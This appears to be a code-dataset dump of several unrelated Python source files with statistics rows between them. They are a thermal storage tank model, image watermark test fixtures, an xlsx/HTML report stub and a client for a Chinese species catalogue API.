charges_worksheet.write(i_row, i_col, float(val), xlsx_numeric_fmt)
except ValueError:
charges_worksheet.write(i_row, i_col, val)
html += """</tr>\n"""
html += """</table>\n"""
html += """</body>
</html>
"""
workbook.close()
return {"html": html, "xlsx_file": xlsx_file}
# Add monthly NSF report
def generate_monthly_agency_report(
es_client,
account,
starting_month_date,
xlsx_directory=Path("./monthly_agency_reports"),
index="cas-credit-accounts",
):
date_str = str(starting_week_date)
xlsx_directory = xlsx_directory / account
xlsx_directory.mkdir(parents=True, exist_ok=True)
xlsx_file = xlsx_directory / f"path-cas-monthly-agency-report_{date_str}.xlsx"
html = """<html>
<head>
</head>
<body style="background-color: white">
<table style="border-collapse: collapse">
"""
workbook = xlsxwriter.Workbook(str(xlsx_file))
worksheet = workbook.add_worksheet()
# Create table
html += """</table>
</body>
</html>
"""
workbook.close()
return {"html": html, "xlsx_file": xlsx_file}
| 34.860526 | 129 | 0.614328 | 1,706 | 13,247 | 4.564478 | 0.141266 | 0.012328 | 0.008989 | 0.014383 | 0.598433 | 0.542186 | 0.507513 | 0.48337 | 0.463208 | 0.437909 | 0 | 0.006695 | 0.244584 | 13,247 | 379 | 130 | 34.952507 | 0.77146 | 0.039783 | 0 | 0.425806 | 0 | 0.029032 | 0.265737 | 0.058851 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025806 | false | 0 | 0.045161 | 0 | 0.109677 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d12f0de2573c638981e43ff0b8def9aea95aeba7 | 24,481 | py | Python | cea/technologies/storage_tank_pcm.py | architecture-building-systems/cea-toolbox | bfec7ecb4b242449ab8796a1e8ce68c05c35f1d6 | [
"MIT"
] | null | null | null | cea/technologies/storage_tank_pcm.py | architecture-building-systems/cea-toolbox | bfec7ecb4b242449ab8796a1e8ce68c05c35f1d6 | [
"MIT"
] | null | null | null | cea/technologies/storage_tank_pcm.py | architecture-building-systems/cea-toolbox | bfec7ecb4b242449ab8796a1e8ce68c05c35f1d6 | [
"MIT"
] | null | null | null | """
Water / Ice / PCM short-term thermal storage (for daily operation)
"""
import numpy as np
from cea.technologies.storage_tank import calc_tank_surface_area, calc_cold_tank_heat_gain
from math import log
from cea.analysis.costs.equations import calc_capex_annualized
__author__ = "Jimeno Fonseca"
__copyright__ = "Copyright 2021, Cooling Singapore"
__credits__ = ["Jimeno Fonseca, Mathias Niffeler"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "NA"
__email__ = "jimeno.fonseca@ebp.ch"
__status__ = "Production"
class Storage_tank_PCM(object):
def __init__(self, size_Wh:float, database_model_parameters, T_ambient_K:float,
type_storage:str, activation=True, debug=False):
# INITIALIZING THE CLASS
self.hour = 0 # this just to know when the storage is being run.
self.debug = debug # this is to show extra messages and debug the code easily
self.activated = activation # It is a boolean and indicates if the storage is on or off (True or False)
self.hour_of_last_activation = 0 # this is to make sure passive thermal gains are accounted for correctly.
self.size_Wh = size_Wh # It is a float and it is the size of the storage in Wh
self.T_ambient_K = T_ambient_K # temperature outside the tank used to calculate thermal losses (
self.type_storage = type_storage # code which refers to the type of storage to be used from the conversion database
# INITIALIZING MODEL PARAMETERS FROM DATABASE OF CONVERSION TECHNOLOGIES / TES
self.storage_prop = database_model_parameters[database_model_parameters['code'] == type_storage]
self.description = self.storage_prop['Description'].values[0]
self.T_phase_change_K = self.storage_prop['T_PHCH_C'].values[0] + 273.0
self.T_tank_fully_charged_K = self.storage_prop['T_min_C'].values[0] + 273.0
self.T_tank_fully_discharged_K = self.storage_prop['T_max_C'].values[0] + 273.0
self.latent_heat_phase_change_kJ_kg = self.storage_prop['HL_kJkg'].values[0]
self.density_phase_change_kg_m3 = self.storage_prop['Rho_T_PHCH_kgm3'].values[0]
self.specific_heat_capacity_solid_kJ_kgK = self.storage_prop['Cp_kJkgK'].values[0]
self.specific_heat_capacity_liquid_kJ_kgK = self.storage_prop['Cp_kJkgK'].values[0]
self.charging_efficiency = self.storage_prop['n_ch'].values[0]
self.discharging_efficiency = self.storage_prop['n_disch'].values[0]
# INITIALIZE OTHER PHYSICAL PROPERTIES NEEDED THROUGH THE SCRIPT
self.AT_solid_to_phase_K = self.T_phase_change_K - self.T_tank_fully_charged_K
self.AT_phase_to_liquid_K = self.T_tank_fully_discharged_K - self.T_phase_change_K
self.mass_storage_max_kg = calc_storage_tank_mass(self.size_Wh,
self.AT_solid_to_phase_K,
self.AT_phase_to_liquid_K,
self.latent_heat_phase_change_kJ_kg,
self.specific_heat_capacity_liquid_kJ_kgK,
self.specific_heat_capacity_solid_kJ_kgK)
self.V_tank_m3 = self.mass_storage_max_kg / self.density_phase_change_kg_m3
self.Area_tank_surface_m2 = calc_tank_surface_area(self.V_tank_m3)
self.cap_phase_change_Wh = self.mass_storage_max_kg * self.latent_heat_phase_change_kJ_kg / 3.6
self.cap_solid_phase_Wh = self.mass_storage_max_kg * self.specific_heat_capacity_solid_kJ_kgK * self.AT_solid_to_phase_K / 3.6
self.cap_liquid_phase_Wh = self.mass_storage_max_kg * self.specific_heat_capacity_liquid_kJ_kgK * self.AT_phase_to_liquid_K / 3.6
# initialize variables and properties (empty storage)
self.T_tank_K = self.T_tank_fully_discharged_K
self.current_phase = 1 # "1=liquid, 2=phasechange, 3=solid"
self.current_storage_capacity_Wh = 0.0
self.hourly_thermal_gain_Wh = 0.0
self.current_thermal_gain_Wh = 0.0
if self.debug:
print("...initializing the storage...")
print("The type of storage is a {}".format(self.description))
print("The volume and mass of the Storage is {:.2f} m3 and {:.2f} ton".format(self.V_tank_m3,
self.mass_storage_max_kg / 1000))
print(
"The storage capacity at solid, phase change, and liquid phase are {:.2f} kWh, {:.2f} kWh, and {:.2f} kWh".format(
self.cap_solid_phase_Wh/ 1000, self.cap_phase_change_Wh/ 1000, self.cap_liquid_phase_Wh/ 1000))
print(
"The minimum, phase change, and maximum Temperatures of the storaage are {:.2f} °C, {:.2f} °C, and {:.2f} °C".format(
self.T_tank_fully_charged_K - 273, self.T_phase_change_K - 273, self.T_tank_fully_discharged_K - 273))
print("...initialization of the storage finished...")
def balance_storage(self):
"""
The aim of this function is to calculate the new state of the storage if it was not charged or discharged.
So pretty much we factor in the thermal gain when the storage remains idle.
"""
if self.activated:
if self.debug:
print("The current capacity and temperature is {:.2f} kWh, and {:.2f} °C".format(
self.current_storage_capacity_Wh / 1000, self.T_tank_K - 273))
self.current_thermal_gain_Wh = self.hourly_thermal_gain_Wh * (self.hour - self.hour_of_last_activation)
new_storage_capacity_wh = self.current_storage_capacity_Wh - self.current_thermal_gain_Wh
new_phase = self.new_phase_tank(new_storage_capacity_wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_wh, self.current_thermal_gain_Wh) # Since the third argument is the "load difference", thermal gains should be input as negative load differences TODO: Check this with Jimeno
new_thermal_loss_Wh = calc_cold_tank_heat_gain(self.Area_tank_surface_m2,
(new_T_tank_K + self.T_tank_K) / 2,
self.T_ambient_K)
# finally update all variables
self.current_phase = new_phase
self.hourly_thermal_gain_Wh = new_thermal_loss_Wh
self.T_tank_K = new_T_tank_K
self.current_storage_capacity_Wh = new_storage_capacity_wh
self.hour_of_last_activation = self.hour
if self.debug:
print("The new capacity and temperature is {:.2f} kWh, and {:.2f} °C".format(
self.current_storage_capacity_Wh / 1000, self.T_tank_K - 273, ))
return self.current_storage_capacity_Wh
def new_phase_tank(self, new_storage_capacity_wh):
tol = 0.000001
# case 1: the storage tank is in liquid change
if 0.0 <= new_storage_capacity_wh <= self.cap_liquid_phase_Wh:
new_phase = 1
# case 2: the storage tank is in phase change
elif self.cap_liquid_phase_Wh < new_storage_capacity_wh <= (self.cap_liquid_phase_Wh + self.cap_phase_change_Wh):
new_phase = 2
# case 3: the storage tank is in the solid phase
elif (self.cap_liquid_phase_Wh + self.cap_phase_change_Wh) < new_storage_capacity_wh <= (
self.cap_liquid_phase_Wh + self.cap_phase_change_Wh + self.cap_solid_phase_Wh + tol):
new_phase = 3
else:
print("there was an error, the new capacity was {} and the thermal loss was {}".format(new_storage_capacity_wh, self.current_thermal_gain_Wh))
return new_phase
def new_temperature_tank(self, new_phase, new_storage_capacity_wh, heat_gain_Wh):
T0 = self.T_tank_K
m = self.mass_storage_max_kg
Cp_l = self.specific_heat_capacity_liquid_kJ_kgK
Cp_s = self.specific_heat_capacity_solid_kJ_kgK
current_phase = self.current_phase
if current_phase == 1 and new_phase == 1:
if self.debug:
print("liquid phase is maintained")
Tb = T0
T1 = Tb + (heat_gain_Wh * 3.6) / (m * Cp_l)
elif current_phase == 2 and new_phase == 2:
if self.debug:
print("phase change is maintained")
T1 = self.T_phase_change_K
elif current_phase == 3 and new_phase == 3:
if self.debug:
print("solid phase is maintained")
Tb = T0
T1 = Tb + (heat_gain_Wh * 3.6) / (m * Cp_s)
elif current_phase == 1 and new_phase == 2: # moving from liquid to phase # charging
if self.debug:
print("moving from liquid to phase change")
T1 = self.T_phase_change_K
elif current_phase == 2 and new_phase == 3: # moving from phase to solid # charging
if self.debug:
print("moving from phase to solid phase")
Tb = self.T_phase_change_K
T1 = Tb - ((self.cap_solid_phase_Wh - (self.size_Wh - new_storage_capacity_wh)) * 3.6) / (m * Cp_s)
elif current_phase == 1 and new_phase == 3: # moving from liquid to solid # charging
if self.debug:
print("moving from liquid to solid phase")
Tb = self.T_phase_change_K
T1 = Tb - ((self.cap_solid_phase_Wh - (self.size_Wh - new_storage_capacity_wh)) * 3.6) / (m * Cp_s)
elif current_phase == 3 and new_phase == 2: # moving from solid to phase # discharging
if self.debug:
print("moving from solid to phase change")
T1 = self.T_phase_change_K
elif current_phase == 2 and new_phase == 1: # moving from phase to liquid # discharging
if self.debug:
print("moving from phase change to liquid phase")
Tb = self.T_phase_change_K
T1 = Tb + ((self.cap_liquid_phase_Wh - new_storage_capacity_wh) * 3.6) / (m * Cp_l)
elif current_phase == 3 and new_phase == 1: # moving from solid to liquid # discharging
if self.debug:
print("moving from solid to liquid change")
Tb = self.T_phase_change_K
T1 = Tb + ((self.cap_liquid_phase_Wh - new_storage_capacity_wh) * 3.6) / (m * Cp_l)
if T1 == np.nan:
print("error at hour {}".format(self.hour))
return T1
def charge_storage(self, load_to_storage_Wh):
if self.activated:
# calculate passive thermal gain since last activation
self.current_thermal_gain_Wh = self.hourly_thermal_gain_Wh * (self.hour - self.hour_of_last_activation)
if self.debug:
print("...charging...")
print("The current capacity and temperature is {:.2f} kWh, and {:.2f} °C".format(
self.current_storage_capacity_Wh / 1000, self.T_tank_K - 273))
print("The requested load was {:.2f} kW".format(
load_to_storage_Wh / 1000))
print("The current thermal gain is {:.2f} kW".format(
self.current_thermal_gain_Wh / 1000))
# factor the efficiency of the exchange in
effective_load_to_storage_Wh = load_to_storage_Wh * self.charging_efficiency
# discount the thermal gain due to a hotter environment
state_the_storage_after_thermal_gain = self.current_storage_capacity_Wh - self.current_thermal_gain_Wh
if state_the_storage_after_thermal_gain <= 0.0: # check so we do not get negative storage capacities.
state_the_storage_after_thermal_gain = 0.0
# CASE 1 the storage is empty:
if state_the_storage_after_thermal_gain == 0.0:
# CASE 1.1 the effective load is bigger than the capacity of the storage
if effective_load_to_storage_Wh >= self.size_Wh:
effective_load_to_storage_Wh = self.size_Wh
new_storage_capacity_Wh = self.size_Wh
new_phase = self.new_phase_tank(new_storage_capacity_Wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_Wh, self.current_thermal_gain_Wh - effective_load_to_storage_Wh)
# CASE 1.2 the effective load is smaller than the capacity of the storage
elif effective_load_to_storage_Wh < self.size_Wh:
new_storage_capacity_Wh = effective_load_to_storage_Wh
new_phase = self.new_phase_tank(new_storage_capacity_Wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_Wh, self.current_thermal_gain_Wh - effective_load_to_storage_Wh)
# CASE 2 the storage is partially full or full
elif 0.0 < state_the_storage_after_thermal_gain <= self.size_Wh:
# CASE 2.1 the effective load + the storage capacity now is bigger than the total capacity
if (state_the_storage_after_thermal_gain + effective_load_to_storage_Wh) >= self.size_Wh:
effective_load_to_storage_Wh = self.size_Wh - state_the_storage_after_thermal_gain
new_storage_capacity_Wh = self.size_Wh
new_phase = self.new_phase_tank(new_storage_capacity_Wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_Wh, self.current_thermal_gain_Wh - effective_load_to_storage_Wh)
# CASE 2.2 the effective load + the storage capacity now is lower than the total capacity
elif (state_the_storage_after_thermal_gain + effective_load_to_storage_Wh) < self.size_Wh:
effective_load_to_storage_Wh = effective_load_to_storage_Wh
new_storage_capacity_Wh = state_the_storage_after_thermal_gain + effective_load_to_storage_Wh
new_phase = self.new_phase_tank(new_storage_capacity_Wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_Wh, self.current_thermal_gain_Wh - effective_load_to_storage_Wh)
# recalculate the storage capacity after losses
final_load_to_storage_Wh = effective_load_to_storage_Wh / self.charging_efficiency
new_hourly_thermal_gain_Wh = calc_cold_tank_heat_gain(self.Area_tank_surface_m2,
(new_T_tank_K + self.T_tank_K) / 2,
self.T_ambient_K)
# finally update all variables
self.current_phase = new_phase
self.hourly_thermal_gain_Wh = new_hourly_thermal_gain_Wh
self.T_tank_K = new_T_tank_K
self.current_storage_capacity_Wh = new_storage_capacity_Wh
self.hour_of_last_activation = self.hour
if self.debug:
print("The possible load was {:.2f} kWh".format(final_load_to_storage_Wh / 1000))
print("The new capacity and temperature is {:.2f} kWh, and {:.2f} °C".format(
self.current_storage_capacity_Wh / 1000, self.T_tank_K - 273, ))
return final_load_to_storage_Wh, new_storage_capacity_Wh
else:
return 0.0, 0.0
def discharge_storage(self, load_from_storage_Wh):
if self.activated:
# calculate passive thermal gain since last activation
self.current_thermal_gain_Wh = self.hourly_thermal_gain_Wh * (self.hour - self.hour_of_last_activation)
if self.debug:
print("...discharging...")
print("The current capacity and temperature is {:.2f} kWh, and {:.2f} °C".format(
self.current_storage_capacity_Wh / 1000, self.T_tank_K - 273))
print("The requested load was {:.2f} kW".format(
load_from_storage_Wh / 1000))
print("The current thermal gain is {:.2f} kW".format(
self.current_thermal_gain_Wh / 1000))
# factor in the efficiency of discharge
effective_load_from_storage_Wh = load_from_storage_Wh / self.discharging_efficiency
# discount the thermal gain due to a hotter environment
state_the_storage_after_thermal_gain = self.current_storage_capacity_Wh - self.current_thermal_gain_Wh
if state_the_storage_after_thermal_gain <= 0.0: # check so we do not get negative storage capacities.
state_the_storage_after_thermal_gain = 0.0
# CASE 1 the storage is empty:
if state_the_storage_after_thermal_gain == 0.0:
effective_load_from_storage_Wh = 0.0
new_storage_capacity_Wh = state_the_storage_after_thermal_gain
new_phase = self.new_phase_tank(new_storage_capacity_Wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_Wh, 0.0) # TODO: If the thermal gain is too high it can actually raise beyond the maximum Temperature. This case is not considered. There will be a need to Precool the storage?
# CASE 2 the storage is partially full or full:
elif 0.0 < state_the_storage_after_thermal_gain <= self.size_Wh:
# CASE 2.1 the request is too high and will go beyond emptying the storage
if (state_the_storage_after_thermal_gain - effective_load_from_storage_Wh) < 0.0:
effective_load_from_storage_Wh = state_the_storage_after_thermal_gain
new_storage_capacity_Wh = 0.0
new_phase = self.new_phase_tank(new_storage_capacity_Wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_Wh, self.current_thermal_gain_Wh + effective_load_from_storage_Wh)
# CASE 2.2 the request is just right and it will not empty the storage
elif (state_the_storage_after_thermal_gain - effective_load_from_storage_Wh) >= 0.0:
effective_load_from_storage_Wh = effective_load_from_storage_Wh
new_storage_capacity_Wh = state_the_storage_after_thermal_gain - effective_load_from_storage_Wh
new_phase = self.new_phase_tank(new_storage_capacity_Wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_Wh, self.current_thermal_gain_Wh + effective_load_from_storage_Wh)
# recalculate the storage capacity after losses
final_load_from_storage_Wh = effective_load_from_storage_Wh * self.discharging_efficiency
new_hourly_thermal_gain_Wh = calc_cold_tank_heat_gain(self.Area_tank_surface_m2,
(new_T_tank_K + self.T_tank_K) / 2,
self.T_ambient_K)
# finally update all variables
self.current_phase = new_phase
self.hourly_thermal_gain_Wh = new_hourly_thermal_gain_Wh
self.T_tank_K = new_T_tank_K
self.current_storage_capacity_Wh = new_storage_capacity_Wh
self.hour_of_last_activation = self.hour
if self.debug:
print("The requested load to discharge was {:.2f} kW, the possible load to discharge was {:.2f} kWh".format(
load_from_storage_Wh / 1000, final_load_from_storage_Wh / 1000))
print("The new capacity and temperature is {:.2f} kWh, and {:.2f} °C".format(
self.current_storage_capacity_Wh / 1000, self.T_tank_K - 273, ))
return final_load_from_storage_Wh, new_storage_capacity_Wh
else:
return 0.0, 0.0
def costs_storage(self):
if self.activated:
capacity_kWh = self.size_Wh / 1000
if capacity_kWh > 0.0:
storage_cost_data = self.storage_prop
# if the Q_design is below the lowest capacity available for the technology, then it is replaced by
# the least capacity for the corresponding technology from the database
if capacity_kWh < storage_cost_data.iloc[0]['cap_min']:
capacity_kWh = storage_cost_data[0]['cap_min']
storage_cost_data = storage_cost_data[(storage_cost_data['cap_min'] <= capacity_kWh) & (storage_cost_data['cap_max'] > capacity_kWh)]
Inv_a = storage_cost_data.iloc[0]['a']
Inv_b = storage_cost_data.iloc[0]['b']
Inv_c = storage_cost_data.iloc[0]['c']
Inv_d = storage_cost_data.iloc[0]['d']
Inv_e = storage_cost_data.iloc[0]['e']
Inv_IR = storage_cost_data.iloc[0]['IR_%']
Inv_LT = storage_cost_data.iloc[0]['LT_yr']
Inv_mat_LT = storage_cost_data.iloc[0]['LT_mat_yr']
C_mat_LT = storage_cost_data.iloc[0]['C_mat_%'] / 100
Inv_OM = storage_cost_data.iloc[0]['O&M_%'] / 100
Capex_total_USD = Inv_a + Inv_b * (capacity_kWh) ** Inv_c + (Inv_d + Inv_e * capacity_kWh) * log(capacity_kWh)
Capex_a_storage_USD = calc_capex_annualized(Capex_total_USD, Inv_IR, Inv_LT)
Capex_a_storage_USD += calc_capex_annualized(Capex_total_USD * C_mat_LT, Inv_IR, Inv_mat_LT)
Opex_fixed_storage_USD = Capex_total_USD * Inv_OM
else:
Capex_a_storage_USD = 0.0
Opex_fixed_storage_USD = 0.0
Capex_total_USD = 0.0
return Capex_a_storage_USD, Opex_fixed_storage_USD, Capex_total_USD
else:
return 0.0, 0.0, 0.0
def calc_storage_tank_mass(size_Wh,
AT_solid_to_phase_K,
AT_phase_to_liquid_K,
latent_heat_phase_change_kJ_kg,
specific_heat_capacity_liquid_kJ_kgK,
specific_heat_capacity_solid_kJ_kgK):
mass_kg = size_Wh * 3.6 / (specific_heat_capacity_solid_kJ_kgK * AT_solid_to_phase_K +
specific_heat_capacity_liquid_kJ_kgK * AT_phase_to_liquid_K +
latent_heat_phase_change_kJ_kg)
return mass_kg
if __name__ == '__main__':
##### TEST ######
import plotly.graph_objs as go
from cea.plots.variable_naming import COLOR, NAMING
# select one tank to test
type_storage = "TES6"
# test tank based in unittests (Check the unittests to see how this works)
from cea.tests.test_technologies import TestColdPcmThermalStorage
test = TestColdPcmThermalStorage()
TestColdPcmThermalStorage.setUpClass()
test.type_storage = type_storage
# the test returns a. results of the checkResults, b. the data, c. a description of the tank.
# the first is used as reference parameter of the checkResults. The B and C are used to make a plot as follows.
results, data, description = test.test_cold_pcm_thermal_storage(checkResults=True)
print(results)
# here is the second test about volume and costs of the storage
results = test.test_cold_pcm_thermal_storage_costs(checkResults=True)
print(results)
# plot results
analysis_fields = ["Q_DailyStorage_gen_directload_W", "Q_DailyStorage_to_storage_W"]
traces = []
fig = go.Figure()
for field in analysis_fields:
y = data[field].values / 1E3 # to kWh
name = NAMING[field]
fig.add_trace(go.Bar(x=data.index, y=y, name=name, marker=dict(color=COLOR[field]), yaxis='y'))
fig.add_trace(go.Line(x=data.index, y=data["Q_DailyStorage_content_W"] / 1000, yaxis='y', name=NAMING["Q_DailyStorage_content_W"], line_shape='spline'))
fig.add_trace(go.Line(x=data.index, y=data["T_DailyStorage_C"], yaxis='y2', name=NAMING["T_DailyStorage_C"], line_shape='spline'))
fig.update_layout(title=description,
yaxis=dict(title='Load [kWh]'),
yaxis2=dict(title='Tank Temperature [C]', overlaying='y', side='right', range=[-1, 14]))
fig.update_layout(legend=dict(
yanchor="top",
y=0.99,
xanchor="left",
x=0.01
))
fig.show()
| 57.198598 | 266 | 0.644622 | 3,399 | 24,481 | 4.26449 | 0.109444 | 0.060021 | 0.062159 | 0.053812 | 0.669127 | 0.61435 | 0.566747 | 0.5188 | 0.495274 | 0.445257 | 0 | 0.019764 | 0.282832 | 24,481 | 427 | 267 | 57.332553 | 0.80532 | 0.137658 | 0 | 0.350158 | 0 | 0.009464 | 0.090095 | 0.006048 | 0 | 0 | 0 | 0.002342 | 0 | 1 | 0.025237 | false | 0 | 0.022082 | 0 | 0.082019 | 0.104101 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d12f8da3310c8830d23fe7b1dede9ec6e95c6006 | 2,428 | py | Python | tests/fixtures/watermark_fixtures.py | dynamicguy/thumbor | 4e69ec6289ef549109cdfc72bf765b9dc62f9763 | [
"MIT"
] | 6,837 | 2015-01-01T14:33:12.000Z | 2022-03-31T22:21:05.000Z | tests/fixtures/watermark_fixtures.py | dynamicguy/thumbor | 4e69ec6289ef549109cdfc72bf765b9dc62f9763 | [
"MIT"
] | 1,055 | 2015-01-03T22:22:05.000Z | 2022-03-31T21:56:17.000Z | tests/fixtures/watermark_fixtures.py | dynamicguy/thumbor | 4e69ec6289ef549109cdfc72bf765b9dc62f9763 | [
"MIT"
] | 744 | 2015-01-05T03:49:31.000Z | 2022-03-30T02:35:16.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/thumbor/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com thumbor@googlegroups.com
import preggy
POSITIONS = [
# length (either width or height), position in percent, expected string
(800, "-20p", "-160"),
(800, "30p", "240"),
(800, "230p", "1840"),
(50, "37p", "19"),
(55, "53p", "29"),
(55, "-53p", "-29"),
(800, "center", "center"),
(800, "30", "30"),
(800, "-40", "-40"),
(800, "repeat", "repeat"),
]
SOURCE_IMAGE_SIZES = [
(800, 600),
(600, 600),
(600, 800),
]
WATERMARK_IMAGE_SIZES = [
# bigger ones
(1200, 900),
(900, 900),
(900, 1200),
# one size bigger
(1200, 500),
(700, 400),
(400, 700),
# equal
(800, 600),
(600, 600),
# smaller
(500, 300),
(300, 300),
(300, 500),
]
RATIOS = [
# only X
(300, None),
(200, None),
(100, None),
(50, None),
(25, None),
# only Y
(None, 300),
(None, 200),
(None, 100),
(None, 50),
(None, 25),
# X and Y
(300, 300),
(200, 200),
(100, 100),
(50, 50),
(25, 25),
(300, 25),
(300, 50),
(300, 100),
(300, 200),
(25, 300),
(50, 300),
(100, 300),
(200, 300),
(25, 50),
(50, 25),
]
@preggy.assertion
def to_fit_into(topic, boundary, **kwargs):
assert (
topic <= boundary
), "Expected topic({topic}) to fit into boundary {boundary} with test: {test}".format(
topic=topic, boundary=boundary, test=kwargs
)
@preggy.assertion
def to_be_true_with_additional_info(topic, **kwargs):
assert topic, "Expected topic to be true with test: {test}".format(test=kwargs)
@preggy.assertion
def to_be_equal_with_additional_info(topic, expected, **kwargs):
assert (
topic == expected
), "Expected topic({topic}) to be ({expected}) with test: {test}".format(
topic=topic, expected=expected, test=kwargs
)
@preggy.assertion
def to_almost_equal(topic, expected, differ, **kwargs):
assert abs(1 - topic / expected) <= (differ / 100.0), (
"Expected topic({topic}) to be almost equal expected"
"({expected}) differing only in {percent}% with test: {test}"
).format(topic=topic, expected=expected, test=kwargs, percent=differ)
| 21.486726 | 90 | 0.562191 | 305 | 2,428 | 4.416393 | 0.347541 | 0.067558 | 0.053452 | 0.059391 | 0.267261 | 0.234595 | 0.198961 | 0.123237 | 0.123237 | 0.080178 | 0 | 0.145765 | 0.251236 | 2,428 | 112 | 91 | 21.678571 | 0.59516 | 0.151977 | 0 | 0.148148 | 0 | 0 | 0.175636 | 0 | 0 | 0 | 0 | 0 | 0.098765 | 1 | 0.049383 | false | 0 | 0.012346 | 0 | 0.061728 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d12fca9ac4610e1cb1ad72805e91521f0a7f4dec | 17,301 | py | Python | SP2000/sp2000.py | ynulihao/SP2000 | b1ab57b8f6f9c69b0612a02e033c9ae190f50faf | [
"MIT"
] | 6 | 2020-06-01T11:26:15.000Z | 2020-07-09T01:02:20.000Z | SP2000/sp2000.py | ynulihao/SP2000_python | b1ab57b8f6f9c69b0612a02e033c9ae190f50faf | [
"MIT"
] | null | null | null | SP2000/sp2000.py | ynulihao/SP2000_python | b1ab57b8f6f9c69b0612a02e033c9ae190f50faf | [
"MIT"
] | 2 | 2020-06-01T11:26:18.000Z | 2020-11-11T03:31:30.000Z | import requests
import json
import pandas as pd
import re
from xml.etree import ElementTree
import warnings
class SP2000:
def __init__(self):
self.key = None
def set_search_key(self, key):
"""SP2000 API keys
Apply for the apiKey variable to be used by all search_* functions,
register for http://sp2000.org.cn/api/document and use an API key. This function allows users to set this key.
:param key: Value to set apiKey(i.e. your API key).
:return: None
"""
self.key = key
# checkAPI
data = json.loads(requests.get('http://www.sp2000.org.cn/api/v2/getFamiliesByFamilyName',
params={'familyName': 'Cyprinidae', 'apiKey': self.key,
'page': 1}).text)
assert data['code'] != 401, 'Please check your apiKey.'
def search_family_id(self, *queries, start=1, limit=20):
"""Search family IDs
Search family IDs via family name, supports Latin and Chinese names.
:param queries:Family name, or part of family name, supports Latin and Chinese names. Single or more query.
:param start:intenger Record number to start at. If omitted, the results are returned from the first record
(start=1). Use in combination with limit to page through results. Note that we do the paging internally for
you, but you can manually set the start parameter.
:param limit: intenger Number of records to return. This is passed across all sources,when you first query,
set the limit to something smallish so that you can get a result quickly, then do more as needed.
:return:
"""
assert self.key, 'You need to apply for the apiKey from http://sp2000.org.cn/api/document'
fids = {}
for query in queries:
page_num = limit // 20
fid_list = []
for idx in range(page_num):
data = json.loads(requests.get('http://www.sp2000.org.cn/api/v2/getFamiliesByFamilyName',
params={'familyName': query, 'apiKey': self.key,
'page': start + idx}).text)
for entry in data['data']['familes']:
fid_list.append(entry['record_id'])
fids[query] = fid_list
return fids
def search_taxon_id(self, *queries, name='scientificName', start = 1, limit = 20):
"""Search taxon IDs
Search taxon IDs via familyID ,scientificName and commonName.
:param queries: familyID ,scientificName or commonName. Single or more query.
:param name: stype should in ("familyID","scientificName","commonName"),the default value is "scientificName".
:param start:intenger Record number to start at. If omitted, the results are returned from the first record
(start=1). Use in combination with limit to page through results. Note that we do the paging internally for
you, but you can manually set the start parameter.
:param limit: intenger Number of records to return. This is passed across all sources,when you first query,
set the limit to something smallish so that you can get a result quickly, then do more as needed.
:return:
"""
assert self.key, ' You need to apply for the apiKey from http://sp2000.org.cn/api/document'
assert name in ['familyId', 'scientificName', 'commonName'],\
'name should in ("familyID","scientificName","commonName"),the default value is "scientificName".'
taxon_id = {}
if name == 'familyId':
for query in queries:
page_num = limit // 20
fid_list = []
for idx in range(page_num):
data = json.loads(requests.get('http://www.sp2000.org.cn/api/v2/getSpeciesByFamilyId',
params={'familyId': query, 'apiKey': self.key,
'page': start + idx}).text)
if data['data']['species'] is None:
continue
for entry in data['data']['species']:
fid_list.append(entry['namecode'])
taxon_id[query] = fid_list
elif name == 'scientificName':
for query in queries:
page_num = limit // 20
fid_list = []
for idx in range(page_num):
data = json.loads(requests.get('http://www.sp2000.org.cn/api/v2/getSpeciesByScientificName',
params={'scientificName': query, 'apiKey': self.key,
'page': start + idx}).text)
if data['data']['species'] is None:
continue
for entry in data['data']['species']:
fid_list.append(entry['accepted_name_info']['namecode'])
taxon_id[query] = fid_list
elif name == 'commonName':
for query in queries:
page_num = limit // 20
fid_list = []
for idx in range(page_num):
data = json.loads(requests.get('http://www.sp2000.org.cn/api/v2/getSpeciesByCommonName',
params={'commonName': query, 'apiKey': self.key,
'page': start + idx}).text)
if data['data']['species'] is None:
continue
for entry in data['data']['species']:
fid_list.append(entry['accepted_name_info']['namecode'])
taxon_id[query] = fid_list
return taxon_id
def search_checklist(self, *queries):
"""Search Catalogue of Life China checklist
Get checklist via species or infraspecies ID.
:param queries: single or more query
:return:
"""
assert self.key, ' You need to apply for the apiKey from http://sp2000.org.cn/api/document'
checklist = {}
for taxon_id in queries:
data = json.loads(requests.get('http://www.sp2000.org.cn/api/v2/getSpeciesByNameCode',
params={'nameCode': taxon_id, 'apiKey': self.key}).text)['data']
if data is None:
continue
checklist[taxon_id] = data
return checklist
@staticmethod
def list_df(checklist):
"""Catalogue of Life China list(s) convert data frame(deprecated)
Checklist lists convert data frame.
:param checklist: return from search_checklist
